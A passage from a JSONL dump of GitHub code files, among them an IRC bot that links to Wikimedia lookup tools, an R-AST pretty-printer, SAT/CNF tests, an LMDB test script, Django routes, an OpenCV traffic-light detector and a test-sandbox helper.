https://ipcheck.toolforge.org/index.php?ip=\" + target)\n\n\n@plugin.command(\"rbf\")\ndef rbf(bot, trigger):\n # !rbf \n target = trigger.group(3)\n bot.say(\n \"Range block finder: https://rangeblockfinder.toolforge.org/?excludelow&ip=\"\n + target\n )\n\n\n@plugin.command(\"stalk\")\ndef stalk(bot, trigger):\n # !stalk \n target = trigger.group(2)\n bot.say(\"Stalktoy: https://meta.toolforge.org/stalktoy/\" + target.replace(\" \", \"_\"))\n\n\n@plugin.command(\"stewardry\")\ndef stewardry(bot, trigger):\n # !stewardry \n target = trigger.group(3)\n bot.say(\n \"Stewardry (sysop): https://meta.toolforge.org/stewardry/\"\n + target.replace(\" \", \"_\")\n )\n\n\n@plugin.command(\"urban\")\ndef urban(bot, trigger):\n # !urban \n target = trigger.group(2)\n bot.say(\n \"Urban Dictionary lookup: https://www.urbandictionary.com/define.php?term=\"\n + target.replace(\" \", \"_\")\n )\n\n\n@plugin.command(\"whois\")\ndef whois(bot, trigger):\n # !whois \n target = trigger.group(3)\n bot.say(\n \"WHOIS lookup: https://whois-referral.toolforge.org/gateway.py?lookup=true&ip=\"\n + target\n )\n\n\n@plugin.command(\"xact\")\ndef xact(bot, trigger):\n # !xact \n target = trigger.group(2)\n bot.say(\n \"CrossActivity: https://meta2.toolforge.org/crossactivity/\"\n + target.replace(\" \", \"_\")\n )\n\n\n@plugin.require_owner(\n \"This command has been disabled, as the tool is currently offline.\"\n)\n@plugin.command(\"xcon\")\ndef xcon(bot, trigger):\n # !xcon \n target = trigger.group(2)\n bot.say(\n \"xContribs: https://erwin85.toolforge.org/xcontribs.php?user=\"\n + target.replace(\" \", \"_\")\n )\n\n\n@plugin.command(\"xguc\")\ndef xguc(bot, trigger):\n if trigger.group(2) != \"\":\n if re.search(r\"\\/\", trigger.group(3)):\n bot.say(\"https://xtools.wmflabs.org/globalcontribs/ipr-\" + trigger.group(3))\n else:\n bot.say(\"https://xtools.wmflabs.org/globalcontribs/\" + trigger.group(3))\n else:\n bot.say(\"What is the target? !xguc \")\n\n\n@plugin.command(\"xtools\")\ndef xtools(bot, trigger):\n # !xtools \n tricky_ones = [\n \"commons\",\n \"incubator\",\n \"mediawiki\",\n \"outreach\",\n \"sources\",\n \"species\",\n \"wikidata\",\n \"meta\",\n ]\n try:\n project, target = trigger.group(2).split(\" \", 1)\n except ValueError:\n bot.say(\"Something is missing... Syntax is !xtools \")\n return\n\n target = target.replace(\" \", \"_\")\n if project in tricky_ones:\n if project == \"commons\":\n bot.say(\n \"XTools: https://xtools.wmflabs.org/ec/commons.wikimedia.org/\" + target\n )\n elif project == \"incubator\":\n bot.say(\n \"XTools: https://xtools.wmflabs.org/ec/incubator.wikimedia.org/\"\n + target\n )\n elif project == \"mediawiki\":\n bot.say(\"XTools: https://xtools.wmflabs.org/ec/www.mediawiki.org/\" + target)\n elif project == \"outreach\":\n bot.say(\n \"XTools: https://xtools.wmflabs.org/ec/outreach.wikimedia.org/\" + target\n )\n elif project == \"sources\":\n bot.say(\n \"XTools: https://xtools.wmflabs.org/ec/www.wikisource.org/\" + target\n )\n elif project == \"species\":\n bot.say(\n \"XTools: https://xtools.wmflabs.org/ec/species.wikimedia.org/\" + target\n )\n elif project == \"wikidata\":\n bot.say(\"XTools: https://xtools.wmflabs.org/ec/www.wikidata.org/\" + target)\n elif project == \"meta\":\n bot.say(\n \"XTools: https://xtools.wmflabs.org/ec/meta.wikimedia.org/\" + target\n )\n else:\n try:\n lang, proj = re.split(\"w\", project)\n lang = lang.replace(\"_\", \"-\")\n except ValueError:\n lang = None\n\n target = target.replace(\" \", \"_\")\n\n if lang is not None:\n if proj == \"iki\":\n bot.say(\n \"XTools: https://xtools.wmflabs.org/ec/\"\n + lang\n + \".wikipedia.org/\"\n + target\n )\n else:\n bot.say(\n \"XTools: https://xtools.wmflabs.org/ec/\"\n + lang\n + \".w\"\n + proj\n + \".org/\"\n + target\n )\n\n else:\n bot.say(\n \"Hmm... I've tried and just can't figure out which project \"\n + project\n + \" is. I'm sorry.\"\n )\n","repo_name":"Operator873/SAM-retired","sub_path":"wikicmds.py","file_name":"wikicmds.py","file_ext":"py","file_size_in_byte":9236,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"72675283735","text":"\"\"\" Pretty-printer for the R AST.\n\nFor references on the R grammar, see ast.py.\n\nTODO:\n - Special functions: if, while, for, etc\n - Function definition: function(x) x+1\n\"\"\"\nfrom __future__ import absolute_import\n\nimport math\nfrom io import BytesIO as StringIO\nfrom textwrap import TextWrapper\n\nfrom nemesis.r import ast\n\n\n# Public API\n\ndef write_ast(node, out, indent=0):\n \"\"\" Pretty-prints an R AST to a file-like object.\n \"\"\"\n out.write(indent * ' ')\n _write_ast(node, out, indent)\n\ndef print_ast(node, indent=0):\n \"\"\" Pretty-prints an R AST as a string.\n \"\"\"\n io = StringIO()\n write_ast(node, io, indent)\n return io.getvalue()\n\n\n# Private write functions\n\ndef _write_ast(node, out, indent):\n for klass in node.__class__.__mro__:\n writer = writers.get(klass)\n if writer:\n return writer(node, out, indent)\n raise TypeError('Unknown node type %s' % node.__class__.__name__)\n\ndef _write_constant(node, out, indent):\n value = node.value\n if isinstance(value, bool):\n out.write('TRUE' if value else 'FALSE')\n elif isinstance(value, float) and math.isinf(value):\n out.write('Inf' if value > 0 else '-Inf')\n elif isinstance(value, float) and math.isnan(value):\n # Follow Pandas in using NaN to represent missing data.\n out.write('NA')\n elif isinstance(value, complex):\n new_node = ast.Call(ast.Name('complex'),\n (ast.Name('real'), ast.Constant(value.real)),\n (ast.Name('imaginary'), ast.Constant(value.imag)))\n _write_ast(new_node, out, indent)\n elif isinstance(value, unicode):\n out.write(repr(value.encode('ascii')))\n else:\n out.write(repr(value))\n\ndef _write_name(node, out, indent):\n out.write(node.value)\n \ndef _write_call(node, out, indent):\n # Dispatch on the kind of call being made.\n if _is_call_index(node):\n _write_call_index(node, out, indent)\n elif _is_call_operator(node):\n _write_call_operator(node, out, indent)\n else:\n # If we get here, it's a standard function call.\n _write_call_standard(node, out, indent)\n\ndef _write_call_index(node, out, indent):\n if not len(node.args) == 2:\n raise ValueError('Malformed index node %r' % node)\n \n _write_ast(node.args[0], out, indent)\n out.write(node.fn.value)\n _write_ast(node.args[1], out, indent)\n out.write(']' if node.fn.value == '[' else ']]')\n\ndef _write_call_operator(node, out, indent):\n # Unary case.\n if len(node.args) == 1:\n _write_ast(node.fn, out, indent)\n _write_ast(node.args[0], out, indent)\n \n # Binary case.\n elif len(node.args) == 2:\n # First argument.\n first = node.args[0]\n parens = (_is_call_operator(first) and\n _operator_precedence(first) < _operator_precedence(node))\n out.write('(' if parens else '')\n _write_ast(first, out, indent)\n out.write(')' if parens else '')\n \n # Operator.\n out.write('' if _print_hint(node) == 'short' else ' ')\n _write_ast(node.fn, out, indent)\n out.write('' if _print_hint(node) == 'short' else ' ')\n \n # Second argument. The difference in inequality strictness is due to\n # R's left-to-right evaluation order for operators of equal precedence.\n second = node.args[1]\n parens = (_is_call_operator(second) and\n _operator_precedence(second) <= _operator_precedence(node))\n out.write('(' if parens else '')\n _write_ast(second, out, indent)\n out.write(')' if parens else '')\n \n\ndef _write_call_standard(node, out, indent):\n _write_ast(node.fn, out, indent)\n out.write('(')\n\n # We can't predict the length of a general expression.\n if isinstance(node.fn, ast.Name):\n indent += len(node.fn.value) + 1\n else:\n indent += 2\n\n for i, node_or_pair in enumerate(node.args):\n # Print the argument separator (if not on the first argument).\n if i > 0:\n if _print_hint(node) == 'long':\n out.write(',')\n _write_newline(out, indent)\n else:\n out.write(',' if _print_hint(node) == 'short' else ', ')\n \n # Print the argument itself.\n if isinstance(node_or_pair, tuple):\n _write_ast(node_or_pair[0], out, indent)\n out.write('=' if _print_hint(node) == 'short' else ' = ')\n _write_ast(node_or_pair[1], out, indent)\n else:\n _write_ast(node_or_pair, out, indent)\n\n out.write(')')\n\ndef _write_pair_list(node, out, indent):\n for i, name_or_pair in enumerate(node.value):\n if i > 0:\n out.write(', ')\n if isinstance(name_or_pair, tuple):\n _write_ast(name_or_pair[0], out, indent)\n out.write(' = ')\n _write_ast(name_or_pair[1], out, indent)\n else:\n _write_ast(name_or_pair, out, indent)\n\ndef _write_block(node, out, indent):\n for i, expr in enumerate(node.value):\n if i > 0:\n if _print_hint(node) == 'short':\n out.write('; ')\n elif _print_hint(node) == 'long':\n _write_newline(out, 0)\n _write_newline(out, indent)\n else:\n _write_newline(out, indent)\n _write_ast(expr, out, indent)\n\ndef _write_comment(node, out, indent):\n wrapper = TextWrapper(initial_indent = '# ',\n subsequent_indent = indent * ' ' + '# ',\n break_long_words = False)\n out.write(wrapper.fill(node.value))\n\ndef _write_raw(node, out, indent):\n out.write(node.value)\n\ndef _write_newline(out, indent):\n out.write('\\n')\n out.write(' ' * indent)\n\n\n# Additional private functions\n\ndef _is_call_index(node):\n return (isinstance(node, ast.Call) and \n isinstance(node.fn, ast.Name) and node.fn.value in ('[', '[['))\n\ndef _is_call_operator(node):\n if not (isinstance(node, ast.Call) and isinstance(node.fn, ast.Name)):\n return False\n sym = node.fn.value\n num_args = len(node.args)\n return ((sym, num_args) in OP_PRECEDENCE or\n (sym.startswith('%') and sym.endswith('%') and num_args == 2))\n\ndef _operator_precedence(node):\n assert _is_call_operator(node)\n default = OP_PRECEDENCE[('%%', 2)]\n return OP_PRECEDENCE.get((node.fn.value, len(node.args)), default) \n\ndef _print_hint(node):\n return node.metadata.get('print_hint', 'normal')\n\n\n# Globals and constants\n\nwriters = { ast.Constant: _write_constant,\n ast.Name: _write_name,\n ast.Call: _write_call,\n ast.PairList: _write_pair_list,\n ast.Block: _write_block,\n ast.Comment: _write_comment,\n ast.Raw: _write_raw }\n\n# Binary and unary operators with precedence\n# \n# Reference: \n# http://stat.ethz.ch/R-manual/R-patched/library/base/html/Syntax.html\nOP_PRECEDENCE = {\n ('^', 2) : 14,\n ('-', 1) : 13, ('+', 1) : 13,\n (':', 2) : 12,\n ('%%', 2) : 11, # Any special operator (including %% and %/%)\n ('*', 2) : 10, ('/', 2) : 10,\n ('+', 2) : 9, ('-', 2) : 9,\n ('<', 2) : 8, ('>', 2) : 8, ('<=', 2) : 8, ('>=', 2) : 8,\n ('==', 2) : 8, ('!=', 2) : 8,\n ('!', 1) : 7,\n ('&', 2) : 6, ('&&', 2) : 6,\n ('|', 2) : 5, ('||', 2) : 5,\n ('~', 2) : 4,\n ('->', 2) : 3, ('->>', 2) : 3,\n ('<-', 2) : 2, ('<<-', 2) : 2,\n ('=', 2) : 1,\n ('?', 1) : 0, ('?', 2) : 0,\n}","repo_name":"AvianaGlobal/nemesis-mbmi","sub_path":"main/nemesis/r/pretty_print.py","file_name":"pretty_print.py","file_ext":"py","file_size_in_byte":7519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"3173214607","text":"from tomriddle import cnf\nfrom time import time\nfrom sympy import symbols\nimport sympy.logic.boolalg as form\nfrom operator import invert\nfrom itertools import combinations\n\nfrom pycosat import itersolve\n\nfrom tomriddle import satbridge\n\n\ndef test_max_n_true():\n\n symbs = symbols(\"a,b,c,d,e\")\n mapper = satbridge.SymbolMapper(symbs)\n\n sat_in = cnf.max_n_true(symbs, 3, mapper=mapper)\n print(sat_in)\n ways = list(itersolve(sat_in))\n\n # none with more than three true\n for way in ways:\n assert len(way) == len(symbs)\n true_symbs = list(filter(lambda x: x > 0, way))\n assert 3 >= len(true_symbs)\n print(true_symbs)\n\n # one for each subset of size 0, 1, 2, or 3\n expect_num = (\n len(list(combinations(symbs, 3)))\n + len(list(combinations(symbs, 2)))\n + len(list(combinations(symbs, 1)))\n + 1 # the empty solution\n )\n assert expect_num == len(ways)\n\n\ndef test_min_n_true():\n\n symbs = symbols(\"a,b,c,d,e\")\n mapper = satbridge.SymbolMapper(symbs)\n\n sat_in = cnf.min_n_true(symbs, 3, mapper=mapper)\n print(sat_in)\n ways = list(itersolve(sat_in))\n\n # none with more than three true\n for way in ways:\n assert len(way) == len(symbs)\n true_symbs = list(filter(lambda x: x > 0, way))\n assert 3 <= len(true_symbs)\n print(true_symbs)\n\n # one for each subset of size 0, 1, 2, or 3\n expect_num = (\n len(list(combinations(symbs, 3)))\n + len(list(combinations(symbs, 4)))\n + 1 # the full solution\n )\n assert expect_num == len(ways)\n\n\ndef test_exactly_n_true():\n\n symbs = symbols(\"a,b,c,d,e\")\n mapper = satbridge.SymbolMapper(symbs)\n\n min_constraint = cnf.min_n_true(symbs, 2, mapper=mapper)\n max_constraint = cnf.max_n_true(symbs, 2, mapper=mapper)\n\n solutions = list(itersolve(min_constraint + max_constraint))\n\n assert len(list(combinations(symbs, 2))) == len(solutions)\n\n for sol in solutions:\n true_only = list(filter(lambda x: x > 0, sol))\n assert 2 == len(true_only)\n\n\ndef test_next_set():\n\n # {5, 1, 8} is the largest set after deduplication, so it will be chosen from\n begin = [[1, 2, 1], [3, 4], [5, 1, 8]]\n expect = (frozenset({1, 5, 8}), set([frozenset({1, 2}), frozenset({3, 4})]))\n result = cnf._next_set(begin)\n\n assert expect == result\n\n\ndef test_next_set_setinput():\n\n begin = {frozenset([1, 2, 1]), frozenset([3, 4]), frozenset([5, 1, 8])}\n expect = (frozenset({1, 5, 8}), set([frozenset({1, 2}), frozenset({3, 4})]))\n result = cnf._next_set(begin)\n\n assert expect == result\n\n\ndef test_setproduct():\n\n clauses = set(list(cnf._setproduct([[1, 2], [3, 4]])))\n\n assert clauses == {\n frozenset([1, 3]),\n frozenset([1, 4]),\n frozenset([2, 3]),\n frozenset([2, 4]),\n }\n\n\ndef test_setproduct_moar():\n\n terms = [[1, 2], [2, 3, 4], [5]]\n sp = set(list(cnf._setproduct(terms)))\n\n assert sp == {\n frozenset([1, 2, 5]),\n frozenset([1, 3, 5]),\n frozenset([1, 4, 5]),\n frozenset([2, 5]),\n frozenset([2, 3, 5]),\n frozenset([2, 4, 5]),\n }\n\n\ndef dnf_equivalence(expr, symbs):\n\n mapper = satbridge.SymbolMapper(symbs)\n\n # convert with sympy\n def control(expr):\n cnf_expr = form.to_cnf(expr, simplify=True, force=True)\n sat_in = satbridge.expr_to_satfmt(cnf_expr, mapper)\n return sat_in\n\n # convert with something I made up\n def experiment(expr):\n return cnf.from_dnf(expr, mapper)\n\n def get_solns(func):\n\n # make expression\n before = time()\n cnf_clauses = func(expr)\n\n # find solutions\n solutions = []\n for sat_out in itersolve(cnf_clauses):\n true_only = list(filter(lambda x: x > 0, sat_out))\n if true_only:\n expr_out = cnf.AND(list(map(mapper.to_symb, true_only)))\n solutions.append(expr_out)\n\n after = time()\n return solutions, after - before\n\n # do they yield the same solutions?\n experiment_solns, experiment_duration = get_solns(experiment)\n control_solns, control_duration = get_solns(control)\n\n print(\"control\", control_duration, \"seconds\")\n print(\"experiment\", experiment_duration, \"seconds\")\n\n # this an obnoxious way to assert equality,\n # but expressions aren't hashable and order doesn't matter\n\n for c in control_solns:\n assert c in experiment_solns\n\n for e in experiment_solns:\n assert e in control_solns\n\n\ndef test_dnf_a():\n\n # which ways for every other one to be true\n symbs = symbols(\"a,b,c,d,e,f\")\n a, b, c, d, e, f = symbs\n expr = (a & c & e) | (b & d & f)\n dnf_equivalence(expr, symbs)\n\n\ndef test_dnf_b():\n\n # how many ways for 3 of these to be true?\n symbs = symbols(\"a,b,c,d,e,f\")\n microstates = []\n for microstate in combinations(symbs, 2):\n microstates.append(cnf.AND(microstate))\n expr = cnf.OR(microstates)\n\n dnf_equivalence(expr, symbs)\n\n\ndef test_dnf_c():\n\n # how many ways for 3 of these to be true?\n symbs = symbols(\"a,b,c,d,e,f,g\")\n a, b, c, d, e, f, g = symbs\n expr = a | (b & ~c) | (a & c) | (d & ~e & ~f & g) | ~g\n\n dnf_equivalence(expr, symbs)\n\n\ndef test_bcd():\n\n # how many ways for 3 consecurive of these to be true?\n symbs = symbols(\"a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t\")\n mapper = satbridge.SymbolMapper(symbs)\n a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r, s, t = symbs\n\n straight_expr = (a & b & c) | (b & c & d) | (c & d & e) | (d & e & f) | (g & h & i)\n straight = cnf.from_dnf(straight_expr, mapper=mapper)\n\n max3 = cnf.max_n_true(symbs, 3, mapper=mapper)\n\n sat_in = straight + max3\n solutions = list(itersolve(sat_in))\n\n nofalse = sorted([list(filter(lambda x: x > 0, y)) for y in solutions])\n assert 5 == len(nofalse)\n print(nofalse)\n","repo_name":"MatrixManAtYrService/tomriddle","sub_path":"tests/test_cnf.py","file_name":"test_cnf.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15295589192","text":"#!/usr/bin/python2\n\"\"\"\nLMDB test 3.\nTwo processes accessing shared memory.\n\"\"\"\nimport argparse\nimport lmdb\nimport logging\nimport psutil\nimport random\nimport string\nimport uuid\n\nlogger = logging.getLogger(__name__)\n\n\nDATAPATH = 'test_data'\nNUM_OF_WRITES = 100\n\n\ndef commandLineArgs():\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\"-r\", \"--reader\", action=\"store_true\", help=\"Run as the reader process.\")\n group.add_argument(\"-w\", \"--writer\", action=\"store_true\", help=\"Run as the writer process.\")\n return parser.parse_args()\n\n\ndef hit_enter():\n try:\n dummy = input('-- hit Enter to continue --')\n except:\n pass #ignore all.\n\n\ndef random_string(string_length=128):\n \"\"\"\n \"\"\"\n characters = string.ascii_letters + string.digits\n return ''.join(random.choice(characters) for i in range(string_length))\n\n\ndef the_writer():\n \"\"\"\n \"\"\"\n logger.debug('lmdb begin Write test.')\n logger.debug('random_string: %s', random_string())\n # map_size=10485760\n # writemap=True\n env_write = lmdb.open(DATAPATH, readonly=False, max_dbs=2)\n with env_write.begin(write=True, buffers=True) as txn:\n txn.put('somename', 'somedata')\n txn.put('mykey', 'myvalue')\n\n for index in range(NUM_OF_WRITES):\n txn.put(str(uuid.uuid4()), random_string())\n #\n logger.info('memory:\\n%s', psutil.virtual_memory())\n hit_enter()\n\n\ndef the_reader():\n \"\"\"\n \"\"\"\n logger.debug('lmdb begin Get test.')\n env_read = lmdb.open(DATAPATH, readonly=True)\n with env_read.begin(write=False, buffers=True) as txn:\n key = 'somename'\n logger.info('key=%s, value=%s', key, txn.get(key))\n key = 'nada'\n logger.info('key=%s, value=%s', key, txn.get(key))\n\n logger.debug('lmdb begin Cursor test.')\n env_read = lmdb.open(DATAPATH, readonly=True)\n with env_read.begin(write=False, buffers=True) as txn:\n cursor = txn.cursor()\n counter = 0\n for key, value in cursor:\n logger.debug('key=%s, value=%s', key, value)\n counter += 1\n #\n logger.info('%d values.', counter)\n logger.info('memory:\\n%s', psutil.virtual_memory())\n hit_enter()\n\n\ndef main(args):\n \"\"\"\n \"\"\"\n logger.info('lmdb test3.')\n logger.info('lmdb version %s', lmdb.version())\n\n if args.writer:\n the_writer()\n\n if args.reader:\n the_reader()\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n args = commandLineArgs()\n main(args)\n","repo_name":"warren-taylor-2hat/lmdb-playground","sub_path":"lmdb_test4.py","file_name":"lmdb_test4.py","file_ext":"py","file_size_in_byte":2592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72569252698","text":"from django.conf.urls import url\n\nfrom rbac.views import role\nfrom rbac.views import menu\n\nurlpatterns = [\n # 角色列表\n url(r'^role/list/$', role.role_list, name='role_list'),\n # 角色添加\n url(r'^role/add/$', role.role_add, name='role_add'),\n # 角色修改\n url(r'^role/edit/(?P\\d+)/$', role.role_edit, name='role_edit'),\n # 角色删除\n url(r'^role/del/(?P\\d+)/$', role.role_del, name='role_del'),\n\n # 菜单列表\n url(r'^menu/list/$', menu.menu_list, name='menu_list'),\n # 添加菜单\n url(r'^menu/add/$', menu.menu_add, name='menu_add'),\n # 修改菜单\n url(r'^menu/edit/(?P\\d+)/$', menu.menu_edit, name='menu_edit'),\n # 删除菜单\n url(r'^menu/del/(?P\\d+)/$', menu.menu_del, name='menu_del'),\n\n]","repo_name":"limou09/crm-django","sub_path":"rbac/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18313782635","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 15 13:47:52 2020\n\n@author: broch\n\"\"\"\nimport datetime\nimport time\n\nfrom tqdm import trange\n\n\ndef calc_days_until_today(date):\n \"\"\"datetime(year, month, day, hour, minute, second)\n example date=datetime.datetime(2020, 9, 13, 8, 21, 10)\n \"\"\"\n today = datetime.datetime.today().replace(tzinfo=date.tzinfo)\n interval = today - date # returns a timedelta object\n return interval.days\n\n\ndef wait_secs(secs: int, show_progress_bar: bool = True):\n if not show_progress_bar:\n time.sleep(secs)\n return\n\n for i in trange(secs):\n time.sleep(1)\n","repo_name":"brochj/bothunter","sub_path":"src/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"43552094441","text":"#!/usr/bin/python\n\nimport cv2\nimport urllib\nimport numpy as np\n \nstream=urllib.urlopen('http://192.168.1.49:8080/?action=stream')\nbytes=''\nwhile True:\n bytes+=stream.read(1024)\n a = bytes.find('\\xff\\xd8')\n b = bytes.find('\\xff\\xd9')\n if a!=-1 and b!=-1:\n jpg = bytes[a:b+2]\n bytes= bytes[b+2:]\n i = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8),cv2.CV_LOAD_IMAGE_COLOR)\n cv2.imshow('i',i)\n if cv2.waitKey(1) == 27:\n exit(0)\n","repo_name":"gchinellato/Self-Balance-Robot","sub_path":"nfs-server/modules/ComputerVison/Test/stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"68"} +{"seq_id":"32791817314","text":"import os\nimport cv2\nimport numpy as np\nimport base64\nimport json\nfrom python.src.utils.classes.commons.serwo_objects import SerWOObject\ndef detect(img_from_request):\n # Important simplyfying assumption. Exactly one traffic light is in the view of the camera.\n font = cv2.FONT_HERSHEY_SIMPLEX\n img = img_from_request\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n # color range\n lower_red1 = np.array([0,100,100])\n upper_red1 = np.array([10,255,255])\n lower_red2 = np.array([160,100,100])\n upper_red2 = np.array([180,255,255])\n lower_green = np.array([40,50,50])\n upper_green = np.array([90,255,255])\n lower_yellow = np.array([15,150,150])\n upper_yellow = np.array([35,255,255])\n mask1 = cv2.inRange(hsv, lower_red1, upper_red1)\n mask2 = cv2.inRange(hsv, lower_red2, upper_red2)\n maskg = cv2.inRange(hsv, lower_green, upper_green)\n masky = cv2.inRange(hsv, lower_yellow, upper_yellow)\n maskr = cv2.add(mask1, mask2)\n # hough circle detect\n r_circles = cv2.HoughCircles(maskr, cv2.HOUGH_GRADIENT, 1, 80,\n param1=50, param2=10, minRadius=0, maxRadius=30)\n g_circles = cv2.HoughCircles(maskg, cv2.HOUGH_GRADIENT, 1, 60,\n param1=50, param2=10, minRadius=0, maxRadius=30)\n y_circles = cv2.HoughCircles(masky, cv2.HOUGH_GRADIENT, 1, 30,\n param1=50, param2=5, minRadius=0, maxRadius=30)\n # traffic light detect\n r = 5\n bound = 4.0 / 10\n if r_circles is not None:\n return \"red\"\n if g_circles is not None:\n return \"green\"\n if y_circles is not None:\n return \"yellow\"\n \ndef decode(image_json):\n decoded_image = base64.b64decode(image_json[\"image\"].encode('utf-8'))\n jpeg_as_np = np.frombuffer(decoded_image, dtype=np.uint8)\n image = cv2.imdecode(jpeg_as_np, flags=1)\n return image\n\n\ndef function(serwoObject) -> SerWOObject:\n try:\n image_json = json.loads(serwoObject.get_body())\n image = decode(image_json)\n traffic_color = detect(image)\n ret_val = {\"color\":traffic_color}\n return SerWOObject(body=ret_val)\n except Exception as e:\n return SerWOObject(error=True)","repo_name":"whiz-Tuhin/takeaways","sub_path":"lambda-ml-models/ServerlessInference/TrafficLight/ONNX-TrafficLightDetect/traffic_light_detector.py","file_name":"traffic_light_detector.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"3985266301","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QAction\n\nclass MenuBarDemo(QMainWindow):\n def __init__(self):\n super().__init__()\n self.setWindowTitle('Menubar Demo')\n self.resize(600,500)\n\n self.menuBar = self.menuBar()\n\n fileMenu = self.menuBar.addMenu('File')\n editMenu = self.menuBar.addMenu('Edit')\n undoDeleteMenu = editMenu.addMenu('Undo delete')\n\n exit_action = QAction('Exit App', self)\n exit_action.setShortcut('Ctrl+Q')\n exit_action.triggered.connect(lambda:QApplication.quit())\n\n fileMenu.addAction(exit_action)\n\n yes_action = QAction('Yes', self)\n no_action = QAction('No', self)\n undoDeleteMenu.addAction(yes_action)\n undoDeleteMenu.addAction(no_action)\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n\n demo = MenuBarDemo()\n demo.show()\n\n sys.exit(app.exec_())","repo_name":"joseespiritu/PyQt5","sub_path":"tutorial_pyqt5/MenuBarWidget/demo.pyw","file_name":"demo.pyw","file_ext":"pyw","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"41017361190","text":"import multiprocessing\nimport pdb\nimport os\nimport sys\nimport threading\nimport traceback\n\nimport log\n\npdb._Pdb = pdb.Pdb\nclass ForkedPdb(pdb._Pdb):\n '''\n A Pdb subclass that may be used from a forked multiprocessing child\n '''\n io_manager = None\n def interaction(self, *args, **kwargs):\n _stdin = sys.stdin\n self.io_manager.restore_pipes()\n try:\n sys.stdin = open('/dev/stdin')\n pdb._Pdb.interaction(self, *args, **kwargs)\n finally:\n sys.stdin = _stdin\n self.io_manager.replace_pipes()\n\n\nclass IoManager(object):\n def __init__(self, test, suite):\n self.test = test\n self.suite = suite\n self.log = log.test_log\n self._init_pipes()\n \n def _init_pipes(self):\n self.stdout_rp, self.stdout_wp = os.pipe()\n self.stderr_rp, self.stderr_wp = os.pipe()\n\n def close_parent_pipes(self):\n os.close(self.stdout_wp)\n os.close(self.stderr_wp)\n\n def setup(self):\n self.replace_pipes()\n self.fixup_pdb()\n \n def fixup_pdb(self):\n ForkedPdb.io_manager = self\n pdb.Pdb = ForkedPdb\n\n def replace_pipes(self):\n self.old_stderr = os.dup(sys.stderr.fileno())\n self.old_stdout = os.dup(sys.stdout.fileno())\n\n os.dup2(self.stderr_wp, sys.stderr.fileno())\n sys.stderr = os.fdopen(self.stderr_wp, 'w', 0)\n os.dup2(self.stdout_wp, sys.stdout.fileno())\n sys.stdout = os.fdopen(self.stdout_wp, 'w', 0)\n \n def restore_pipes(self):\n self.stderr_wp = os.dup(sys.stderr.fileno())\n self.stdout_wp = os.dup(sys.stdout.fileno())\n\n os.dup2(self.old_stderr, sys.stderr.fileno())\n sys.stderr = os.fdopen(self.old_stderr, 'w', 0)\n os.dup2(self.old_stdout, sys.stdout.fileno())\n sys.stdout = os.fdopen(self.old_stdout, 'w', 0)\n\n def start_loggers(self):\n self.log_ouput()\n\n def log_ouput(self):\n def _log_output(pipe, log_callback):\n with os.fdopen(pipe, 'r') as pipe:\n # Read iteractively, don't allow input to fill the pipe.\n for line in iter(pipe.readline, ''):\n log_callback(line)\n\n # Don't keep a backpointer to self in the thread. \n log = self.log\n test = self.test\n suite = self.suite\n\n self.stdout_thread = threading.Thread(\n target=_log_output,\n args=(self.stdout_rp, \n lambda buf: log.test_stdout(test, suite, buf))\n )\n self.stderr_thread = threading.Thread(\n target=_log_output,\n args=(self.stderr_rp, \n lambda buf: log.test_stderr(test, suite, buf))\n )\n\n # Daemon + Join to not lock up main thread if something breaks \n # but provide consistent execution if nothing goes wrong.\n self.stdout_thread.daemon = True\n self.stderr_thread.daemon = True\n self.stdout_thread.start()\n self.stderr_thread.start()\n \n def join_loggers(self):\n self.stdout_thread.join()\n self.stderr_thread.join()\n\n\nclass SubprocessException(Exception):\n def __init__(self, exception, trace):\n super(SubprocessException, self).__init__(trace)\n\nclass ExceptionProcess(multiprocessing.Process):\n class Status():\n def __init__(self, exitcode, exception_tuple):\n self.exitcode = exitcode\n if exception_tuple is not None:\n self.trace = exception_tuple[1]\n self.exception = exception_tuple[0]\n else:\n self.exception = None\n self.trace = None\n\n def __init__(self, *args, **kwargs):\n multiprocessing.Process.__init__(self, *args, **kwargs)\n self._pconn, self._cconn = multiprocessing.Pipe()\n self._exception = None\n\n def run(self):\n try:\n super(ExceptionProcess, self).run()\n self._cconn.send(None)\n except Exception as e:\n tb = traceback.format_exc()\n self._cconn.send((e, tb))\n raise\n\n @property\n def status(self):\n if self._pconn.poll():\n self._exception = self._pconn.recv()\n \n return self.Status(self.exitcode, self._exception)\n\n\nclass Sandbox(object):\n def __init__(self, test_parameters):\n\n self.params = test_parameters\n self.io_manager = IoManager(self.params.test, self.params.suite)\n\n self.p = ExceptionProcess(target=self.entrypoint)\n self.p.daemon = True # Daemon + Join to not lock up main thread if something breaks\n self.io_manager.start_loggers()\n self.p.start()\n self.io_manager.close_parent_pipes()\n self.p.join()\n self.io_manager.join_loggers()\n\n status = self.p.status\n if status.exitcode:\n raise SubprocessException(status.exception, 